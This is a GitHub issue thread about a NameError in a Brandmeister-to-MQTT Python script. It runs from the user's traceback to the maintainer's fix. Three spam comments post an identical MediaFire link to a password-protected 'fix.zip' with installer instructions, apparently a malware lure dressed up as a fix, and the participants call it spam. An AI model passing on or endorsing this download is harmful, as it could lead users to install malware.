### ISSUE TITLE
NameError: name 'event' is not defined

### ISSUE THREAD

**Issue by oh2th** [n8acl/bmlh_to_mqtt#1]
When starting the code, I get numerous errors of this:

```
File "/home/tj/src/network.bransmeister.lastheard_to_mqtt/bmlh_to_mqtt.py", line 70, in on_mqtt
    elif event == 'Session-Stop' and callsign != '':
         ^^^^^
NameError: name 'event' is not defined
Exception in thread Thread-71 (_handle_eio_message):
Traceback (most recent call last):
  File "/usr/lib/python3.11/threading.py", line 1038, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.11/threading.py", line 975, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/lib/python3/dist-packages/socketio/client.py", line 705, in _handle_eio_message
    self._handle_event(pkt.namespace, pkt.id, pkt.data)
  File "/usr/lib/python3/dist-packages/socketio/client.py", line 581, in _handle_event
    r = self._trigger_event(data[0], namespace, *data[1:])
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/socketio/client.py", line 629, in _trigger_event
    return self.handlers[namespace][event](*args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
```
paho-mqtt 1.6.1
request 2.28.1
python-socketio[client] 5.7.2

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by oh2th** [comment]
What are those spammers?

**Comment by n8acl** [comment]
Not sure what those spammers are. Ignore them they are wrong. Let me take a look at it when I have a chance today. BM might have changed something again on their data feed.

**Comment by n8acl** [comment]
So I can't blame BM on this one. This one was all me. For some reason and the version I pushed up, I left out the instantiation of the 'event' variable I needed to confirm if the transmission was done. I added that and tested and it works just fine now. go ahead and repull. You might have to copy your config.py file out somewhere else, pull and then put it back. That way you don't loose your configs. Let me know if it is working for you.
